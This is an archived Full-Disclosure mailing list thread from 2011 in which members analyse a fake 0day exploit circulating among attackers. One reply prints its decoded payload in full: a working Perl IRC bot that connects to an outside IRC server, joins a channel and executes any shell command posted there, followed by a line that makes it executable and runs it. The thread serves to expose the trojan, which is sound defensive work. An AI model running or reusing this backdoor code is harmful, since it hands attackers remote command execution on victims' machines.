| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Message-ID: <CAG9dXUy-AEyLEPuLKNZXvupN7RV_t0ZqSQG0Vjzku8xPLH4szQ@mail.gmail.com>
Date: Thu, 27 Oct 2011 11:09:47 +0200
From: rancor <therancor@...il.com>
To: full-disclosure@...ts.grok.org.uk
Subject: Re: I know its old,
but what the heck does this do... (exposing a tool...)
#!/usr/bin/perl$chan="#darknet";$nick="moron";$server="efnet.vuurwerk.nl";$SIG{TERM}={};exit
if fork;use IO::Socket;$sock =
IO::Socket::INET->new($server.":6667")||exit;print $sock "USER moron
+i moron :moronv2\nNICK moron\n";$i=1;while(<$sock>=~/^[^ ]+ ([^ ]+)
/){$mode=$1;last if
$mode=="001";if($mode=="433"){$i++;$nick=~s/\d*$/$i/;print $sock "NICK
$nick\n";}}print $sock "JOIN $chan\nPRIVMSG $chan :Hi, Im a moron that
ran a fake 0day exploit. v2\nPRIVMSG $chan :to run commands on me,
type: ".$nick.": command\n";while(<$sock>){if (/^PING (.*)$/){print
$sock "PONG $1\nJOIN $chan\n";}if(s/^[^ ]+ PRIVMSG $chan :$nick[^
:\w]*:[^ :\w]* (.*)$/$1/){s/\s*$//;$_=`$_`;foreach(split "\n"){print
$sock "RIVMSG $chan :$_\n";sleep 1;}}}#chmod +x /tmp/hi
2>/dev/null;/tmp/hi
2011/10/27 Joshua Thomas <rappercrazzy@...il.com>:
> Use this link to decode the shellcode ...
> ---> http://www.dolcevie.com/js/converter.html
>
> This executes the perl code on the local machine .... :D
>
>
>
>
> On Tue, Oct 25, 2011 at 9:50 PM, xD 0x41 <secn3t@...il.com> wrote:
>>
>> Hello List,
>> Id like people to also, like this thread asks, to pls give some opinion,
>> other than mine.. wich, i am yet to make;
>>
>> http://www.hackerthreads.org/Topic-5973
>>
>> Please look at this .c code on here, if you wish, and tell me, why
>> A. It is still in circulation, seeminlgly, on MANY MANY boxes....
>> B. people still seem to try keep it private :s
>>
>> This morning, a friend from webhostingtalk.com ,asked me to take a look.
>> I have and, i can only sofar say, once i decrypt the shellcode, illĀ know
>> abit more..
>> altho , i rmember this thing, and, somany people were after it, people
>> were paying for it, this is first time i have seen it actually disclosed
>> tho,
>> admittedly only looked today.
>> If skiddies are using it to ddos things, I want to makesure i can expose
>> it, and kill the threats.
>> thankyou.
>> xd .// exposing bullshit as i ride!
>>
>>
>> _______________________________________________
>> Full-Disclosure - We believe in it.
>> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
>> Hosted and sponsored by Secunia - http://secunia.com/
>
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Powered by blists - more mailing lists